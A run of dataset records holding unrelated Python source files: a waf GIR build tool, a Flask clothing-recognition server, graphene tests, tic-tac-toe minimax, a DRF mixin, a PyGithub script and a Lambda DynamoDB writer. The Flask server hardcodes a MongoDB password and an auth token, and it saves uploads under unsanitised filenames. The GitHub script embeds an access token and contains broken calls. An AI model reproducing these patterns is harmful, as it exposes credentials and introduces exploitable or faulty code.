same base\nname as the library. The lib parameter can be left out when the task generator\nalready builds a library to use or the basename of the first header in a\npresent scan parameter designates the library name.\n\nOther GIR repositories to depend upon are configured similar to the check_cfg\nfunction known from c projects. 
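For example (an added sketch, reusing only names shown above): cnf.check_gir('GLib-2.0', store='GLIB') records the repository under GIRINC_GLIB and its pkg-config packages under GIRUSE_GLIB, and a task generator then pulls both in with include='GLIB'.\n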
The underlying libraries will automatically be\nchecked, too, and added to the uselib parameter of any generator that utilizes\na GIR include parameter.\n\nInstallation paths and the location to lookup GIR XML descriptions can be\nconfigured as known from the gnu_dirs package. To do so, the gir tool has to be\nloaded also in the options function.\n\"\"\"\n\nfrom waflib.TaskGen import feature, before_method, after_method\nfrom waflib.Task import Task\nfrom waflib.Errors import WafError\nfrom waflib.Configure import conf\nfrom waflib.Utils import subst_vars\nfrom operator import methodcaller\nfrom os.path import join\nfrom xml.etree.ElementTree import fromstring\n\ndef options(opt):\n opt.load('gnu_dirs')\n\n group = opt.get_option_group(\"Installation directories\")\n group.add_option(\"--girdir\",\n help=\"GIR XML repository [DATAROOTDIR/gir-1.0]\")\n group.add_option(\"--typelibdir\",\n help=\"compiled GIR typelibs [LIBDIR/girepository-1.0]\")\n\n group = opt.get_option_group(\"Configuration options\")\n group.add_option(\"--girsearchpath\",\n help=\"path to lookup GIR repository XML [GIRDIR]\")\n\nGIR_NAMESPACE = '{http://www.gtk.org/introspection/core/1.0}'\n\n@conf\ndef check_gir(cnf, gir, store=None):\n cnf.start_msg(f\"Checking for GIR XML {gir}\")\n girpath = getattr(cnf, 'girpath', None)\n if not girpath:\n girpath = cnf.girpath = cnf.root.find_node(cnf.env.GIRSEARCHPATH)\n env = cnf.env\n\n if not store:\n store = gir.upper()\n\n f = cnf.girpath.find_resource(gir + '.gir')\n if not f:\n cnf.end_msg(\"not found\", 'YELLOW')\n cnf.fatal('The configuration failed')\n env.append_value(f'GIRINC_{store}', (gir, ))\n xml = fromstring(f.read())\n packages = tuple(include.get('name') for include\n in xml.iterfind(GIR_NAMESPACE + 'package'))\n env.append_value(f'GIRUSE_{store}',\n map(methodcaller('upper'), packages))\n recursive = xml.findall(GIR_NAMESPACE + 'include')\n cnf.end_msg(f.abspath())\n\n for package in packages:\n cnf.check_cfg(package=package, args='--cflags --libs')\n for recurse in recursive:\n cnf.check_gir('{name}-{version}'.format(**recurse.attrib))\n\ndef configure(cnf):\n cnf.find_program(\"g-ir-scanner\")\n cnf.find_program(\"g-ir-compiler\")\n env = cnf.env\n env.GIRLIB_T = '-l%s' # template passing library to scanner\n env.GIRPATH_T = '-L%s' # template passing library search path\n env.GIRINC_T = '--include=%s' # template including other GIR repositories\n cnf.env.append_value(\"GIRSCANNERFLAGS\", \"--warn-all\")\n\n cnf.load('gnu_dirs')\n env.GIRDIR = subst_vars(cnf.options.girdir or\n join(\"${DATAROOTDIR}\", \"gir-1.0\"), env)\n env.TYPELIBDIR = subst_vars(cnf.options.typelibdir or\n join(\"${LIBDIR}\", \"girepository-1.0\"), env)\n env.GIRSEARCHPATH = subst_vars(cnf.options.typelibdir or \"${GIRDIR}\", env)\n\nclass gir(Task):\n run_str = \"${G_IR_SCANNER} --no-libtool ${GIRSCANNERFLAGS} \" \\\n \"${GIRLIB_T:GIRLIB} ${GIRPATH_T:GIRPATH} ${GIRINC_T:GIRINC} \" \\\n \"--namespace=${NAMESPACE} --nsversion=${VERSION} \" \\\n \"--output ${TGT} ${SRC}\"\n\n @staticmethod\n def keyword():\n return \"Scanning\"\n\nclass gircompile(Task):\n run_str = \"${G_IR_COMPILER} -o ${TGT} ${SRC}\"\n\n@feature(\"gir\")\n@after_method('apply_link')\n@before_method('process_use')\ndef process_gir(gen):\n scan = gen.to_nodes(getattr(gen, \"scan\", []))\n\n lib = getattr(gen, \"lib\", None)\n if lib:\n lib_gen = gen.bld.get_tgen_by_name(gen.lib)\n lib_task = lib_gen.link_task\n else:\n lib_task = getattr(gen, 'link_task', None)\n if lib_task:\n lib_gen = gen\n else:\n try:\n lib_gen = 
gen.bld.get_tgen_by_name(\n scan[0].name.rpartition('.')[0])\n except IndexError:\n raise WafError(f\"{gen} lacks a library to introspect \"\n \"and does not build one itself\")\n lib_task = lib_gen.link_task\n\n if not scan:\n scan = gen.to_nodes([f\"{lib_gen.target}.h\"])\n namespace = getattr(gen, \"namespace\", None) or \\\n ''.join(map(methodcaller('capitalize'), scan[0].name[:-2].split('_')))\n version = str(getattr(gen, \"version\", 0))\n gir = gen.path.find_or_declare(f\"{namespace}-{version}.gir\")\n\n scan_task = gen.create_task('gir', tgt=gir, src=scan)\n env = scan_task.env\n env.NAMESPACE = namespace\n env.VERSION = version\n\n env.append_value('GIRLIB', [lib_gen.target])\n scan_task.dep_nodes.extend(lib_task.outputs)\n env.append_unique('GIRPATH', [\n lib_task.outputs[0].parent.path_from(gen.path)])\n\n for include in gen.to_list(getattr(gen, \"include\", [])):\n env.append_value('GIRINC', env[f'GIRINC_{include}'])\n\n gen.add_install_files(install_to=env.GIRDIR,\n install_from=scan_task.outputs)\n gen.add_install_files(install_to=env.TYPELIBDIR,\n install_from=gen.create_task('gircompile', gir,\n gir.change_ext('.typelib')).outputs)\n\n try:\n use = gen.to_list(gen.use)\n except AttributeError:\n use = gen.use = []\n for include in gen.to_list(getattr(gen, \"include\", [])):\n use.extend(gen.env[f'GIRUSE_{include}'])\n","repo_name":"dffischer/waf-gobject-introspection","sub_path":"gir.py","file_name":"gir.py","file_ext":"py","file_size_in_byte":6976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11742554129","text":"# USAGE\n# Start the server:\n# \tpython flask_deploy.py\n# Submit a request via cURL:\n# \tcurl -X POST -F image=@dog.jpg 'http://0.0.0.0:5000/predict'\n\n# import the necessary packages\nfrom keras.preprocessing.image import img_to_array, load_img\nfrom keras.models import load_model\nfrom bson.objectid import ObjectId\nfrom PIL import Image\nimport numpy as np\nimport pickle, cv2, os, io, flask, pymongo, random\t\n\n\napp = flask.Flask(__name__)\nAPP_ROOT = os.path.dirname(os.path.abspath(__file__))\napp.config['IMAGE_UPLOADS'] = os.path.join(APP_ROOT, 'uploads')\nmodel_cat = None\nmodel_sty = None\nmodel_rec = None\n\n\n@app.route(\"/predict\", methods=[\"POST\"])\ndef predict():\n\t# ensure an image was properly uploaded to our endpoint\n\tres={}\n\tresult_5={}\n\tres[\"feedback\"] = []\n\tif flask.request.method == \"POST\":\n\t\tif (flask.request.headers.get(\"Authorization\") == \"Basic YWxhZGRpbjpvcGVuc2VzYW1lljrhebgervwekbflisufbewyufewfsngsdbgrrldngsufigbeurgb\"):\n\t\t\tif flask.request.files.get(\"image\"):\n\t\t\t\t\n\t\t\t\tresult_5['item'] = []\n\t\t\t\tresult_5['tags'] = []\n\t\t\t\tres[\"predictions\"] = []\n\t\t\t\t# read the image in PIL format\t\n\t\t\t\timage = flask.request.files[\"image\"]\n\t\t\t\tfilename = image.filename\n\t\t\t\tfile_path = os.path.join(app.config[\"IMAGE_UPLOADS\"], filename)\n\t\t\t\timage_pil = Image.open(image)\n\t\t\t\timage_pil.save(file_path)\n\t\t\t\timage = load_img(file_path, target_size=(96,96))\n\t\t\t\timage = cv2.imread(file_path)\n\t\t\t\timage = cv2.resize(image, (96, 96))\n\t\t\t\timage = image.astype(\"float\") / 255.0\n\t\t\t\timage = img_to_array(image)\n\t\t\t\timage = np.expand_dims(image, axis=0)\n\n\t\t\t\t# classify the input image then find the indexes of the two class\n\t\t\t\t# labels with the *largest* probability\n\t\t\t\tprint(\"[INFO] classifying image...\")\n\t\t\t\tproba_cat = model_cat.predict(image)[0]\n\t\t\t\tidxs_cat 
= np.argsort(proba_cat)[::-1][:2] # return 2 results from categories model\n\t\t\t\tproba_sty = model_sty.predict(image)[0]\n\t\t\t\tidxs_sty = np.argsort(proba_sty)[::-1][:4] # return 4 results from styles model\n\t\t\t\tproba_rec = model_rec.predict(image)[0]\n\t\t\t\tidxs_rec = np.argsort(proba_rec)[::-1][:1] # return 2 results from categories model\n\n\n\t\t\t\t# loop over the indexes of the high confidence class labels\n\t\t\t\tfor (i, j) in enumerate(idxs_rec):\n\t\t\t\t\t# build the label and draw the label on the image\n\t\t\t\t\t# result_5.append(\"{}: {:.2f}%\".format(mlb_cat.classes_[j], proba_cat[j] * 100))\n\t\t\t\t\tif(mlb_rec.classes_[j] == 't-shirts'):\n\t\t\t\t\t\tresult_5['item'] = 't_shirts'\n\t\t\t\t\telse:\n\t\t\t\t\t\tresult_5['item'] = mlb_rec.classes_[j]\n\n\n\t\t\t\t# loop over the indexes of the high confidence class labels\n\t\t\t\tfor (i, j) in enumerate(idxs_cat):\n\t\t\t\t\t# build the label and draw the label on the image\n\t\t\t\t\t# result_5.append(\"{}: {:.2f}%\".format(mlb_cat.classes_[j], proba_cat[j] * 100))\n\t\t\t\t\tresult_5['tags'].append(mlb_cat.classes_[j])\n\t\t\t\t\t# r = {\"label\": \"{}\".format(mlb_cat.classes_[j]), \"probability\": \"{:.2f}\".format(proba_cat[j] * 100)}\n\t\t\t\t\t# res[\"predictions\"].append(r)\n\t\t\t\t# loop over the indexes of the high confidence class labels\n\t\t\t\tfor (i, j) in enumerate(idxs_sty):\n\t\t\t\t\t# build the label and draw the label on the image\n\t\t\t\t\t# result_5.append(\"{}: {:.2f}%\".format(mlb_sty.classes_[j], proba_sty[j] * 100))\n\t\t\t\t\tresult_5['tags'].append(mlb_sty.classes_[j])\n\t\t\t\t\t# r = {\"label\": \"{}\".format(mlb_sty.classes_[j]), \"probability\": \"{:.2f}\".format(proba_sty[j] * 100)}\n\t\t\t\t\t# res[\"predictions\"].append(r)\n\t\t\telse:\n\t\t\t\tres['feedback'].append(\"Flask doesn't get image\")\n\t\telse:\n\t\t\tres['feedback'].append(\"Authorization token is wrong\")\n\telse: \n\t\tres['feedback'].append(\"Request isn`t POST\")\n\n\t# return the data dictionary as a JSON response\n\tprint(result_5)\n\treturn flask.jsonify(result_5)\n\t# return flask.jsonify(res)\n\n\n@app.route(\"/recommend\", methods=[\"POST\"])\ndef recommend():\n\t# ensure an image was properly uploaded to our endpoint\n\tres={}\n\tres[\"feedback\"] = []\n\tif flask.request.method == \"POST\":\n\t\tif (flask.request.headers.get(\"Authorization\") == \"Basic YWxhZGRpbjpvcGVuc2VzYW1lljrhebgervwekbflisufbewyufewfsngsdbgrrldngsufigbeurgb\"):\n\t\t\titemTags = []\n\t\t\trecommended_items = {}\n\t\t\titem = ''\n\t\t\tlook = {}\n\n\t\t\tdatabaseName = flask.request.headers.get(\"DbName\")\n\t\t\tcollectionName = flask.request.headers.get(\"CollName\")\n\t\t\tInputImageID = flask.request.headers.get(\"InputImageID\")\n\n\t\t\tprint('JSON body', flask.request.get_json())\n\t\t\tif(flask.request.get_json()):\n\t\t\t\tFromBody=flask.request.get_json()\n\t\t\t\tprint(FromBody)\n\t\t\t\titem = FromBody['item']\n\t\t\t\titemTags = FromBody['tags']\n\n\t\t\t# Connect to DataBase\n\t\t\tclient = pymongo.MongoClient(\"mongodb+srv://user:fqg78pXPCpt8dtk@cluster0.xzh33.mongodb.net/myFirstDatabase?retryWrites=true&w=majority\")\n\t\t\t# Database Name \n\t\t\tdb = client[databaseName] \n\t\t\t# Collection Name \n\t\t\tcollection = db[collectionName]\n\n\t\t\tobj_id_to_find = ObjectId(InputImageID)\n\t\t\tx = collection.find({\"_id\": obj_id_to_find}) \n\n\t\t\tfor data in x:\n\t\t\t\titem = data['item']\n\t\t\t\titemTags = data['tags']\n\t\t\t\n\t\t\tif(databaseName == 'images' and InputImageID == 
'filters'):\n\t\t\t\tlook1 = {'shoes': 10, 'dresses': 10, 'hats': 10, 'coats': 10, 'pants': 10, 'shorts': 10, 'sweaters': 10, 't_shirts': 10, 'bags': 10 }\n\t\t\telse:\n\t\t\t\tlook1 = {'shoes': 0, 'dresses': 0, 'hats': 0, 'coats': 0, 'pants': 0, 'shorts': 0, 'sweaters': 0, 't_shirts': 0, 'bags': 0 }\n\n\t\t\tneededItems={}\n\n\t\t\tfor clothElement, similarity in look1.items():\n\t\t\t\tneededItems[clothElement] = []\n\t\t\t\tx = collection.find({'item': clothElement})\n\t\t\t\tfor data in x:\n\t\t\t\t\titemID = data['_id']\n\t\t\t\t\tgetTags = data['tags']\n\t\t\t\t\tres = format((len(set(itemTags) & set(getTags)) / float(len(set(itemTags) | set(getTags))) * 100), \".0f\")\n\t\t\t\t\t# print(\"Similarity is = \" + str(res) + ' | ' + str(itemTags) + ' | ' + str(getTags))\n\t\t\t\t\tif(int(res) >= similarity):\n\t\t\t\t\t\tneededItems[clothElement].append(itemID)\n\t\t\t\n\t\t\tcreate_looks_from_single_item(neededItems, look, item, collection, InputImageID)\n\t\telse:\n\t\t\tres['feedback'].append(\"Authorization token is wrong\")\n\t\t\n\telse: \n\t\tres['feedback'].append(\"Request isn`t POST\")\n\n\t# return the data dictionary as a JSON response\n\tprint(look)\n\treturn flask.jsonify(look)\n\t\ndef create_looks_from_single_item(neededItems, look, item, collection, InputImageID):\n\tshoes = {'look1': [\"pants\", \"t_shirts\"], 'look2': [\"pants\", \"sweaters\"], 'look3': [\"shorts\", \"t_shirts\", \"hats\"]}\n\tdresses = {'look1': [\"shoes\", \"bags\"], 'look2': [\"shoes\", \"bags\"], 'look3': [\"shoes\", \"coats\"]}\n\tcoats = {'look1': [\"shoes\", \"pants\", \"sweaters\"], 'look2': [\"shoes\", \"pants\", \"t_shirts\"], 'look3': [\"shoes\", \"pants\", \"sweaters\"]}\n\tpants = {'look1': [\"shoes\", \"t_shirts\"], 'look2': [\"shoes\", \"sweaters\"], 'look3': [\"shoes\", \"sweaters\", \"coats\"]}\n\tshorts = {'look1': [\"shoes\", \"t_shirts\"], 'look2': [\"shoes\", \"t_shirts\"], 'look3': [\"shoes\", \"t_shirts\"]}\n\tsweaters = {'look1': [\"shoes\", \"pants\"], 'look2': [\"shoes\", \"pants\"], 'look3': [\"shoes\", \"pants\", \"coats\"]}\n\tt_shirts = {'look1': [\"shoes\", \"pants\"], 'look2': [\"shoes\", \"pants\"], 'look3': [\"shoes\", \"shorts\"]}\n\n\tif(item==\"shoes\"):\n\t\tgenerate_random_look(shoes, neededItems, look, collection, InputImageID)\n\tif(item==\"dresses\"):\n\t\tgenerate_random_look(dresses, neededItems, look, collection, InputImageID)\n\tif(item==\"coats\"):\n\t\tgenerate_random_look(coats, neededItems, look, collection, InputImageID)\n\tif(item==\"pants\"):\n\t\tgenerate_random_look(pants, neededItems, look, collection, InputImageID)\n\tif(item==\"shorts\"):\n\t\tgenerate_random_look(shorts, neededItems, look, collection, InputImageID)\n\tif(item==\"t_shirts\"):\n\t\tgenerate_random_look(t_shirts, neededItems, look, collection, InputImageID)\n\tif(item==\"sweaters\"):\n\t\tgenerate_random_look(sweaters, neededItems, look, collection, InputImageID)\n\n\t# if(item==\"skirts\"):\n\t# generate_random_look(shoes, neededItems, look, collection, InputImageID)\n\treturn(look)\n\t\n\t\ndef generate_random_look(item, neededItems, look, collection, InputImageID):\n\tfor k,v in item.items():\n\t\tlook[k] = []\n\t\tlook[k].append(InputImageID)\n\t\tfor s in v:\n\t\t\tif(neededItems[s]==[]):\n\t\t\t\tlook[k].append(\"Items doesn't fit!\")\n\t\t\telse:\n\t\t\t\trand_choice = random.choice(neededItems[s])\n\t\t\t\tlook[k].append(str(rand_choice))\n\n\n@app.route(\"/\")\ndef start():\n\treturn \"Hello, server works properly! 
\\n Have a nice day)\"\n\n\ndef load_models():\n\tglobal model_cat\n\tmodel_cat = load_model(APP_ROOT+\"/models/categories_40_epochs.model\")\n\tglobal mlb_cat\n\tmlb_cat = pickle.loads(open(APP_ROOT+\"/models/categories_40_epochs.pickle\", \"rb\").read())\n\tglobal model_sty\n\tmodel_sty = load_model(APP_ROOT+\"/models/styles_40_epochs.model\")\n\tglobal mlb_sty\n\tmlb_sty = pickle.loads(open(APP_ROOT+\"/models/styles_40_epochs.pickle\", \"rb\").read())\n\tglobal model_rec\n\tmodel_rec = load_model(APP_ROOT+\"/models/cloth_recognition.model\")\n\tglobal mlb_rec\n\tmlb_rec = pickle.loads(open(APP_ROOT+\"/models/cloth_recognition.pickle\", \"rb\").read())\n\tprint(\"Models loaded successfully!\")\n\n\nif __name__ == \"__main__\":\n\tprint((\"* Loading Keras model and Flask starting server...\"\n\t\t\"please wait until server has fully started\"))\n\tload_models()\n\tapp.run(host='0.0.0.0', threaded=False, debug=False)\n\n","repo_name":"GreenApple131/eleks-practice","sub_path":"recognize_outfit/flask_model/flask_deploy.py","file_name":"flask_deploy.py","file_ext":"py","file_size_in_byte":8954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17027451872","text":"import datetime\n\nimport pytest\nfrom django.db import models\nfrom py.test import raises\n\nimport graphene\nfrom graphene import relay\n\nfrom ..compat import MissingType, RangeField\nfrom ..types import DjangoNode, DjangoObjectType\nfrom .models import Article, Reporter\n\npytestmark = pytest.mark.django_db\n\n\ndef test_should_query_only_fields():\n with raises(Exception):\n class ReporterType(DjangoObjectType):\n\n class Meta:\n model = Reporter\n only_fields = ('articles', )\n\n schema = graphene.Schema(query=ReporterType)\n query = '''\n query ReporterQuery {\n articles\n }\n '''\n result = schema.execute(query)\n assert not result.errors\n\n\ndef test_should_query_well():\n class ReporterType(DjangoObjectType):\n\n class Meta:\n model = Reporter\n\n class Query(graphene.ObjectType):\n reporter = graphene.Field(ReporterType)\n\n def resolve_reporter(self, *args, **kwargs):\n return ReporterType(Reporter(first_name='ABA', last_name='X'))\n\n query = '''\n query ReporterQuery {\n reporter {\n firstName,\n lastName,\n email\n }\n }\n '''\n expected = {\n 'reporter': {\n 'firstName': 'ABA',\n 'lastName': 'X',\n 'email': ''\n }\n }\n schema = graphene.Schema(query=Query)\n result = schema.execute(query)\n assert not result.errors\n assert result.data == expected\n\n\n@pytest.mark.skipif(RangeField is MissingType,\n reason=\"RangeField should exist\")\ndef test_should_query_postgres_fields():\n from django.contrib.postgres.fields import IntegerRangeField, ArrayField, JSONField, HStoreField\n\n class Event(models.Model):\n ages = IntegerRangeField(help_text='The age ranges')\n data = JSONField(help_text='Data')\n store = HStoreField()\n tags = ArrayField(models.CharField(max_length=50))\n\n class EventType(DjangoObjectType):\n\n class Meta:\n model = Event\n\n class Query(graphene.ObjectType):\n event = graphene.Field(EventType)\n\n def resolve_event(self, *args, **kwargs):\n return Event(\n ages=(0, 10),\n data={'angry_babies': True},\n store={'h': 'store'},\n tags=['child', 'angry', 'babies']\n )\n\n schema = graphene.Schema(query=Query)\n query = '''\n query myQuery {\n event {\n ages\n tags\n data\n store\n }\n }\n '''\n expected = {\n 'event': {\n 'ages': [0, 10],\n 'tags': ['child', 'angry', 'babies'],\n 'data': '{\"angry_babies\": true}',\n 'store': '{\"h\": 
\"store\"}',\n },\n }\n result = schema.execute(query)\n assert not result.errors\n assert result.data == expected\n\n\ndef test_should_node():\n class ReporterNode(DjangoNode):\n\n class Meta:\n model = Reporter\n\n @classmethod\n def get_node(cls, id, info):\n return ReporterNode(Reporter(id=2, first_name='Cookie Monster'))\n\n def resolve_articles(self, *args, **kwargs):\n return [ArticleNode(Article(headline='Hi!'))]\n\n class ArticleNode(DjangoNode):\n\n class Meta:\n model = Article\n\n @classmethod\n def get_node(cls, id, info):\n return ArticleNode(Article(id=1, headline='Article node', pub_date=datetime.date(2002, 3, 11)))\n\n class Query(graphene.ObjectType):\n node = relay.NodeField()\n reporter = graphene.Field(ReporterNode)\n article = graphene.Field(ArticleNode)\n\n def resolve_reporter(self, *args, **kwargs):\n return ReporterNode(\n Reporter(id=1, first_name='ABA', last_name='X'))\n\n query = '''\n query ReporterQuery {\n reporter {\n id,\n firstName,\n articles {\n edges {\n node {\n headline\n }\n }\n }\n lastName,\n email\n }\n myArticle: node(id:\"QXJ0aWNsZU5vZGU6MQ==\") {\n id\n ... on ReporterNode {\n firstName\n }\n ... on ArticleNode {\n headline\n pubDate\n }\n }\n }\n '''\n expected = {\n 'reporter': {\n 'id': 'UmVwb3J0ZXJOb2RlOjE=',\n 'firstName': 'ABA',\n 'lastName': 'X',\n 'email': '',\n 'articles': {\n 'edges': [{\n 'node': {\n 'headline': 'Hi!'\n }\n }]\n },\n },\n 'myArticle': {\n 'id': 'QXJ0aWNsZU5vZGU6MQ==',\n 'headline': 'Article node',\n 'pubDate': '2002-03-11',\n }\n }\n schema = graphene.Schema(query=Query)\n result = schema.execute(query)\n assert not result.errors\n assert result.data == expected\n","repo_name":"amir17688/google_data_p2","sub_path":"67006_test_query.py_C__Users_user_Desktop_data_2_data_google_data_graphql-pytho.py","file_name":"67006_test_query.py_C__Users_user_Desktop_data_2_data_google_data_graphql-pytho.py","file_ext":"py","file_size_in_byte":5090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71202268089","text":"\"\"\"\nTic Tac Toe Player\n\"\"\"\n\nimport math\nimport copy\n\nX = \"X\"\nO = \"O\"\nEMPTY = None\n\ndef initial_state():\n \"\"\"\n Returns starting state of the board.\n \"\"\"\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]\n\ndef player(board):\n \"\"\"\n Returns player who has the next turn on a board.\n \"\"\"\n count = 0\n for row in board:\n count += row.count(X) + row.count(O)\n return O if count % 2 == 1 else X\n\ndef actions(board):\n \"\"\"\n Returns set of all possible actions (i, j) available on the board.\n \"\"\"\n actions = set()\n for row_index, row in enumerate(board):\n for cell_index, cell in enumerate(row):\n if cell is None:\n actions.add((row_index, cell_index))\n return actions\n\ndef result(board, action):\n \"\"\"\n Returns the board that results from making move (i, j) on the board.\n \"\"\"\n row_index = action[0]\n cell_index = action[1]\n if board[row_index][cell_index] is not None:\n raise NameError(\"NotValidMoveError\")\n new_board = copy.deepcopy(board)\n new_board[row_index][cell_index] = player(new_board)\n return new_board\n\ndef winner(board):\n \"\"\"\n Returns the winner of the game, if there is one.\n \"\"\"\n if (board[0][0] == X and board[2][2] == X) and board[1][1] == X or (board[0][2] == X and board[2][0] == X) and board[1][1] == X:\n return X\n elif (board[0][0] == O and board[2][2] == O) and board[1][1] == O or (board[0][2] == O and board[2][0] == O) and board[1][1] == O:\n 
return O\n    for row in board:\n        if all(cell == X for cell in row):\n            return X\n        if all(cell == O for cell in row):\n            return O\n    for i in range(3):\n        if all(row[i] == X for row in board):\n            return X\n        if all(row[i] == O for row in board):\n            return O\n    return None\n\ndef terminal(board):\n    \"\"\"\n    Returns True if game is over, False otherwise.\n    \"\"\"\n    if winner(board) == X or winner(board) == O:\n        return True\n    for row in board:\n        if any(cell is None for cell in row):\n            return False\n    return True\n\ndef utility(board):\n    \"\"\"\n    Returns 1 if X has won the game, -1 if O has won, 0 otherwise.\n    \"\"\"\n    return 1 if winner(board) == X else -1 if winner(board) == O else 0\n\ndef min_value(board):\n    if terminal(board):\n        return utility(board)\n    v = 10000\n    for action in actions(board):\n        v = min(v, max_value(result(board, action)))\n    return v\n\ndef max_value(board):\n    if terminal(board):\n        return utility(board)\n    v = -10000\n    for action in actions(board):\n        v = max(v, min_value(result(board, action)))\n    return v\n\ndef minimax(board):\n    \"\"\"\n    Returns the optimal action for the current player on the board.\n    \"\"\"\n\n    if terminal(board):\n        return None\n    if board == initial_state():\n        return (1,1)\n    scores = []\n    action_list = []\n    for action in actions(board):\n        if player(board) == X:\n            scores.append(min_value(result(board, action)))\n        elif player(board) == O:\n            scores.append(max_value(result(board, action)))\n        action_list.append(action)\n    if player(board) == X:\n        return action_list[scores.index(max(scores))]\n    elif player(board) == O:\n        return action_list[scores.index(min(scores))]\nprint(minimax(initial_state()))\n","repo_name":"becomingmountains/CS50-ai","sub_path":"tictactoe/tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6484892574","text":"from django.db import transaction\n\n\nclass UnpackIdsMixin:\n    \"\"\"\n    Mixin to apply on a ModelViewSet which transforms registered fields from a string containing ids to a list of objects\n    \"1,2,3\" => [{'id': 1}, {'id': 2}, {'id': 3}]\n    or\n    \"1,2,3\" => [1, 2, 3]\n\n    Should define unpackable fields like this :\n    unpack to [{'id': 1}, {'id': 2}, {'id': 3}]\n    unpackable_fields = ('data_field_name',)\n\n    unpack to [1, 2, 3] :\n    unpackable_fields = {'data_field_name': {'flat': True}}\n    \"\"\"\n\n    unpackable_fields = ()\n\n    def get_item_id(self, word, options):\n        \"\"\"\n        If the given tag contains only digits, use it as an id\n        \"\"\"\n        if word.isdigit():\n            item_id = int(word)\n            if isinstance(options, dict) and options.get(\"flat\"):\n                return item_id\n            return {\"id\": item_id}\n        return None\n\n    def __unpack_field__(self, data, field_name):\n        \"\"\"\n        Split the value and replace the field value by a list of instances\n        \"\"\"\n        value = data.get(field_name, None)\n        if not isinstance(value, str):\n            return  # If not a string, do not do anything\n        options = None\n        if isinstance(self.unpackable_fields, dict):\n            options = self.unpackable_fields.get(field_name)\n        word_list = value.split(\",\")\n        items = []\n        for word in word_list:\n            item_id = self.get_item_id(word, options)\n            if item_id:\n                items.append(item_id)\n        data[field_name] = items\n\n    def __unpack_fields__(self, data):\n        for field_name in self.unpackable_fields:\n            self.__unpack_field__(data, field_name)\n\n    def create(self, request, *args, **kwargs):\n        with transaction.atomic():  # If object creation fails, roll back any tag creation\n            self.__unpack_fields__(request.data)\n            return 
super(UnpackIdsMixin, self).create(request, *args, **kwargs)\n\n def update(self, request, *args, **kwargs):\n with transaction.atomic(): # If object create fail rollback any tags creation\n self.__unpack_fields__(request.data)\n return super(UnpackIdsMixin, self).update(request, *args, **kwargs)\n","repo_name":"alexandrenorman/mixeur","sub_path":"helpers/mixins/unpack_ids_mixin.py","file_name":"unpack_ids_mixin.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12523054867","text":"from github import Github\nimport yaml\nimport os\n# credentials.yml contains your usr/repo and PAT created in step 11 above\n# So we load the data into a YML object\ndata = yaml.safe_load(open('amec0001_credentials.yml'))\n# Extract the user and token from the data object\n# 0. Complete these 2 lines below\nuser = 'amechukwu'\ntoken = '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'\n# using an access token\ng = Github(token)\nrepo = g.get_repo(user)\n## Complete your tasks from here\n# 1. Get all branches you have created for your public repo\n\nrepo = g.get_repo(\"PyGithub/PyGithub\")\nlist(repo.get_branches())\n\n\n# 2. Get all pull requests you have created\n\nrepo = g.get_repo(\"PyGithub/PyGithub\")\npr = repo.get_pull(664)\npr\n\n\n# 3. Get a list of commits you have created in your `main` branch.\n\ncommit = repo.get_commit(sha=sha)\nprint(commit.commit.author.date)\nprint(commit.commit.committer.date)\n\n\n","repo_name":"amechukwu/DevOps1","sub_path":"obi.py","file_name":"obi.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6562136039","text":"import json\nfrom decimal import Decimal\nimport boto3\n\ndef lambda_handler(event, context):\n dynamodb = boto3.resource('dynamodb', region_name='eu-central-1')\n table = dynamodb.Table('transactions')\n\n # Check if the event comes from API Gateway\n if 'body' in event:\n event = json.loads(event['body'])\n try:\n transaction_id = event['transaction_id']\n user_id = event['user_id']\n creation_date = event['creation_date']\n product_id = event['product_id']\n num_items = event['num_items']\n transaction_status = event['transaction_status']\n except KeyError as e:\n return {\n 'statusCode': 400,\n 'body': json.dumps(f'Missing required input: {str(e)}')\n }\n\n try:\n response = table.put_item(\n Item={\n 'transaction_id': transaction_id,\n 'user_id': user_id,\n 'creation_date': creation_date,\n 'num_items' : num_items,\n 'product_id': product_id,\n 'transaction_status': transaction_status\n }\n )\n except Exception as e:\n return {\n 'statusCode': 500,\n 'body': json.dumps(f'Error putting item to DynamoDB: {str(e)}')\n }\n\n return {\n 'statusCode': 200,\n 'body': json.dumps('Transaction added to the database!')\n }\n","repo_name":"sidoncloud/aws-de-usecases","sub_path":"UseCase-Lambda-Dynamo/lambda_dynamo_write.py","file_name":"lambda_dynamo_write.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15839644759","text":"from _typeshed import Incomplete\n\nMODE_GENERIC: Incomplete\nMODE_TEXT: Incomplete\nMODE_FONT: Incomplete\nCompressor: Incomplete\nDecompressor: Incomplete\n\ndef compress(string, mode=..., quality: int = ..., lgwin: int = ..., lgblock: int = ...): ...\n\ndecompress: Incomplete\nerror: 
Incomplete\n","repo_name":"youwol/py-youwol","sub_path":".typing_stubs/brotli.pyi","file_name":"brotli.pyi","file_ext":"pyi","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"71223263289","text":"#!/usr/bin/env python3\n# -*- encoding: utf-8 -*-\n'''\n@File : utils.py\n@Time : 2022/08/15 14:43:12\n@Author : julianarhee \n@Contact : juliana.rhee@gmail.com\n'''\n\nimport re\nimport os\nimport glob\n\n# ---------------------------------------------------------------------\n# General\n# ---------------------------------------------------------------------\nnatsort = lambda s: [int(t) if t.isdigit() \\\n else t.lower() for t in re.split('(\\d+)', s)]\n\ndef flatten(t):\n return [item for sublist in t for item in sublist]\n\n\n# ---------------------------------------------------------------------\n# File tree \n# ---------------------------------------------------------------------\ndef print_and_select_session(rootdir='/Volumes/My Book/bandensis-dyad'):\n '''\n Print all sessions found in , then allow user to select by index.\n\n Keyword 